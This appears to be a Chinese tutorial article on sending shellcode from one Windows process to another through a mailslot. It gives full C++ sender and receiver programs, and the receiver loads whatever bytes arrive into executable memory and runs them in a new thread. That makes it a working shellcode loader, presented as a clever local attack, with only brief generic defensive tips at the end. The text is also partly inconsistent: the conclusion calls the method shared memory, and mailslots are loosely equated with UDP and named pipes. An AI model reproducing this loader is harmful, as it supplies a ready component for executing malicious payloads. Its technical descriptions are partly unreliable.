快捷導(dǎo)航

C++使用郵件槽實(shí)現(xiàn)ShellCode跨進(jìn)程傳輸

更新時(shí)間：2023年12月08日 08:08:56 作者：微軟技術(shù)分享

在計(jì)算機(jī)安全領(lǐng)域,進(jìn)程間通信（IPC）一直是一個(gè)備受關(guān)注的話題,在本文中,我們將探討如何使用Windows郵件槽（Mailslot）實(shí)現(xiàn)ShellCode的跨進(jìn)程傳輸,需要的可以參考下

在計(jì)算機(jī)安全領(lǐng)域，進(jìn)程間通信（IPC）一直是一個(gè)備受關(guān)注的話題。在本文中，我們將探討如何使用Windows郵件槽（Mailslot）實(shí)現(xiàn)ShellCode的跨進(jìn)程傳輸。郵件槽提供了一種簡單而有效的單向通信機(jī)制，使得任何進(jìn)程都能夠成為郵件槽服務(wù)器，并通過UDP通信向其他進(jìn)程發(fā)送數(shù)據(jù)。

郵件槽是Windows操作系統(tǒng)提供的一種用于本地進(jìn)程間通信的機(jī)制。它允許一個(gè)進(jìn)程創(chuàng)建一個(gè)命名的槽，并允許其他進(jìn)程通過該槽向創(chuàng)建它的進(jìn)程發(fā)送消息。在本文中，我們將使用郵件槽實(shí)現(xiàn)進(jìn)程間的ShellCode傳輸。如果需要雙向通信或更復(fù)雜的通信需求，需要考慮其他IPC機(jī)制，例如命名管道、套接字等。

服務(wù)端部分

服務(wù)端端部分的實(shí)現(xiàn)非常簡單，通過使用MAIL_SLOT_NAME 可以定義郵件槽的名稱，該名稱用于標(biāo)識(shí)服務(wù)端和客戶端之間的郵件槽。這是一個(gè)字符串常量，按照 Windows 命名約定的格式指定了郵件槽的路徑。

讓我來解釋這個(gè)定義的具體含義：

\\\\.：表示本地計(jì)算機(jī)，即當(dāng)前計(jì)算機(jī)的命名空間。
mailslot：指定郵件槽的類型。
Name：是你給郵件槽指定的名稱，可以根據(jù)實(shí)際需要更改。

所以，整個(gè)路徑 \\\\.\\mailslot\\Name 指代的是一個(gè)本地計(jì)算機(jī)上的郵件槽，其名稱為 Name。這個(gè)路徑會(huì)在創(chuàng)建和打開郵件槽時(shí)使用，確保兩個(gè)進(jìn)程使用相同的路徑來通信。

在服務(wù)端創(chuàng)建郵件槽時(shí)，通過 CreateFile 函數(shù)中的 MAIL_SLOT_NAME 參數(shù)指定郵件槽的名稱，確保服務(wù)端和客戶端使用相同的名稱來建立通信連接。

CreateFile

用于創(chuàng)建或打開文件、文件夾、郵件槽、管道等對(duì)象的句柄。在你提供的代碼中，CreateFile 主要用于打開郵件槽，以便在服務(wù)端寫入數(shù)據(jù)。

以下是 CreateFile 函數(shù)的一般形式：

HANDLE CreateFile(
  LPCTSTR               lpFileName,
  DWORD                 dwDesiredAccess,
  DWORD                 dwShareMode,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  DWORD                 dwCreationDisposition,
  DWORD                 dwFlagsAndAttributes,
  HANDLE                hTemplateFile
);

參數(shù)說明：

lpFileName：指定文件或?qū)ο蟮拿Q，可以是一個(gè)路徑、文件名或其他標(biāo)識(shí)符。
dwDesiredAccess：指定對(duì)文件的訪問權(quán)限，例如 GENERIC_READ、GENERIC_WRITE 等。
dwShareMode：指定共享模式，例如 FILE_SHARE_READ、FILE_SHARE_WRITE 等。
lpSecurityAttributes：指定安全屬性，通常設(shè)置為 NULL。
dwCreationDisposition：指定文件的創(chuàng)建或打開方式，例如 OPEN_EXISTING、CREATE_NEW 等。
dwFlagsAndAttributes：指定文件或?qū)ο蟮膶傩?，例?nbsp;FILE_ATTRIBUTE_NORMAL。
hTemplateFile：指定一個(gè)文件句柄，用于復(fù)制文件屬性。

如上所示，我們只需要遵循郵件槽的創(chuàng)建流程并使用CreateFile創(chuàng)建通信，當(dāng)需要傳輸郵件的時(shí)候可以直接調(diào)用WriteFile發(fā)送郵件，這是一個(gè)很好的功能，你可以發(fā)送郵件也可以發(fā)送各種你喜歡的亂七八糟的東西。

#include <windows.h>
#include <iostream>

using namespace std;

#define MAIL_SLOT_NAME "\\\\.\\mailslot\\Name" 

char ShellCode[] = "此處是ShellCode";

int main(int argc, char* argv[])
{
    HANDLE hWriteMailSlot = NULL;
    while (TRUE)
    {
        hWriteMailSlot = CreateFile(MAIL_SLOT_NAME, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hWriteMailSlot == INVALID_HANDLE_VALUE)
            continue;
        else
            break;
    }
    DWORD dwReturn = 0;

    // 發(fā)送郵件槽
    WriteFile(hWriteMailSlot, ShellCode, strlen(ShellCode), &dwReturn, NULL);
    CloseHandle(hWriteMailSlot);
    return 0;
}

客戶端部分

為了實(shí)現(xiàn)通信，客戶端部分也需要使用郵件槽，在MAIL_SLOT_NAME中指定相同的郵件名，通過CreateMailslot 函數(shù)，創(chuàng)建郵件槽（Mailslot），這是一種用于本地進(jìn)程間通信的機(jī)制。郵件槽是一種命名的管道，用于在同一臺(tái)計(jì)算機(jī)上的不同進(jìn)程之間傳遞數(shù)據(jù)。

以下是 CreateMailslot 函數(shù)的一般形式：

HANDLE CreateMailslot(
  LPCTSTR               lpName,
  DWORD                 nMaxMessageSize,
  DWORD                 lReadTimeout,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
);

參數(shù)說明：

lpName：指定郵件槽的名稱，形如 \\.\mailslot\your_mailslot_name。
nMaxMessageSize：指定郵件槽中消息的最大大小。
lReadTimeout：指定在讀取數(shù)據(jù)時(shí)的超時(shí)時(shí)間（以毫秒為單位）。
lpSecurityAttributes：指定郵件槽的安全屬性，可以為 NULL。

在代碼中，CreateMailslot 用于創(chuàng)建郵件槽：

hReadMailSlot = CreateMailslot(MAIL_SLOT_NAME, 0, 0, NULL);

這行代碼的作用是創(chuàng)建一個(gè)郵件槽，使用了預(yù)定義的郵件槽名稱 MAIL_SLOT_NAME 作為參數(shù)，nMaxMessageSize 和 lReadTimeout 都設(shè)置為零，表示使用默認(rèn)值。如果創(chuàng)建成功，hReadMailSlot 將獲得一個(gè)有效的郵件槽句柄，可以用于后續(xù)的數(shù)據(jù)讀取操作。

創(chuàng)建好鏈接之后接下來就可以通過GetMailslotInfo函數(shù)獲取郵件了，當(dāng)然了這個(gè)要死循環(huán)等待郵件，GetMailslotInfo 用于檢查郵件槽的狀態(tài)信息。它提供了有關(guān)郵件槽當(dāng)前狀態(tài)的信息，例如有多少消息在郵件槽中、每個(gè)消息的大小等。

以下是 GetMailslotInfo 函數(shù)的一般形式：

BOOL GetMailslotInfo(
  HANDLE       hMailslot,
  LPDWORD      lpMaxMessageSize,
  LPDWORD      lpNextSize,
  LPDWORD      lpMessageCount,
  LPDWORD      lpReadTimeout
);

參數(shù)說明：

hMailslot：郵件槽的句柄，通過 CreateMailslot 函數(shù)或 CreateFile 函數(shù)獲得。
lpMaxMessageSize：指向一個(gè)變量，用于接收郵件槽中單個(gè)消息的最大大小。
lpNextSize：指向一個(gè)變量，用于接收下一個(gè)消息的大小。
lpMessageCount：指向一個(gè)變量，用于接收郵件槽中當(dāng)前的消息數(shù)目。
lpReadTimeout：指向一個(gè)變量，用于接收在讀取數(shù)據(jù)時(shí)的超時(shí)時(shí)間（以毫秒為單位）。

在你的代碼中，GetMailslotInfo 用于獲取郵件槽的信息：

bOk = GetMailslotInfo(hReadMailSlot, NULL, &cbMessage, &cMessage, NULL);

這行代碼的作用是獲取郵件槽 hReadMailSlot 的信息，其中 cbMessage 接收消息的大小，cMessage 接收消息的數(shù)量。這樣的信息可以在接收方確定是否有待處理的消息，以及處理這些消息所需的空間。

一般來說當(dāng)收到了新郵件之后可以直接使用ReadFile函數(shù)讀出這段郵件，讀出來的郵件就可以直接反彈了，如下代碼所示；

#include <windows.h>
#include <iostream>

using namespace std;

#define MAIL_SLOT_NAME "\\\\.\\mailslot\\Name" 
HANDLE hReadMailSlot = INVALID_HANDLE_VALUE;

DWORD WINAPI ReadMail()
{
    hReadMailSlot = CreateMailslot(MAIL_SLOT_NAME, 0, 0, NULL);
    if (hReadMailSlot == INVALID_HANDLE_VALUE)
    {
        return -1;
    }

    // 查看油槽的信息
    DWORD cbMessage = 0, dwReturn = 0, cMessage = 0;
    BOOL bOk = FALSE;

    char ShellCode[4096] = { 0 };

    while (TRUE)
    {
        bOk = GetMailslotInfo(hReadMailSlot, NULL, &cbMessage, &cMessage, NULL);
        if (bOk == FALSE)
            break;
        if (cMessage == 0)
            continue;
        else
        {
            if (ReadFile(hReadMailSlot, ShellCode, cbMessage, &dwReturn, 0) == TRUE)
            {
                HANDLE hThread = NULL;
                cout << ShellCode << endl;
                
                // 注入ShellCode并執(zhí)行
                void* ptr = VirtualAlloc(0, sizeof(ShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                CopyMemory(ptr, ShellCode, sizeof(ShellCode));

                hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ptr, 0, 0, 0);
                WaitForSingleObject(hThread, INFINITE);
            }
        }
    }
}

int main(int argc, char* argv[])
{
    HANDLE hReadThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ReadMail, NULL, 0, NULL);
    Sleep(INFINITE);
    if (hReadMailSlot != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hReadMailSlot);
    }
    return 0;
}

潛在風(fēng)險(xiǎn)和安全建議

雖然這種方法在本地攻擊場景中有一定的巧妙性，但也存在潛在的風(fēng)險(xiǎn)。以下是一些建議：

防御共享內(nèi)存濫用： 操作系統(tǒng)提供了一些機(jī)制，如使用 ACL（訪問控制列表）和安全描述符，可以限制對(duì)共享內(nèi)存的訪問。合理配置這些機(jī)制可以減輕潛在的濫用風(fēng)險(xiǎn)。
加強(qiáng)系統(tǒng)安全策略： 使用強(qiáng)密碼、及時(shí)更新系統(tǒng)和應(yīng)用程序、啟用防火墻等都是基礎(chǔ)的系統(tǒng)安全策略。這些都有助于防止?jié)撛诘腟hellcode攻擊。
監(jiān)控和響應(yīng)： 部署實(shí)時(shí)監(jiān)控和響應(yīng)系統(tǒng)，能夠及時(shí)檢測到異常行為并采取相應(yīng)措施，對(duì)于減緩潛在威脅的影響十分重要。

總結(jié)

本文介紹了通過共享內(nèi)存?zhèn)鬟fShellcode的方法，通過這種巧妙的本地攻擊方式，兩個(gè)進(jìn)程可以在不直接通信的情況下相互傳遞Shellcode。然而，使用這種技術(shù)需要非常謹(jǐn)慎，以免被濫用用于不當(dāng)用途。在實(shí)際應(yīng)用中，必須謹(jǐn)慎權(quán)衡安全性和便利性，同時(shí)配合其他防御措施，確保系統(tǒng)的整體安全性。

到此這篇關(guān)于C++使用郵件槽實(shí)現(xiàn)ShellCode跨進(jìn)程傳輸?shù)奈恼戮徒榻B到這了,更多相關(guān)C++ ShellCode跨進(jìn)程傳輸內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

您可能感興趣的文章: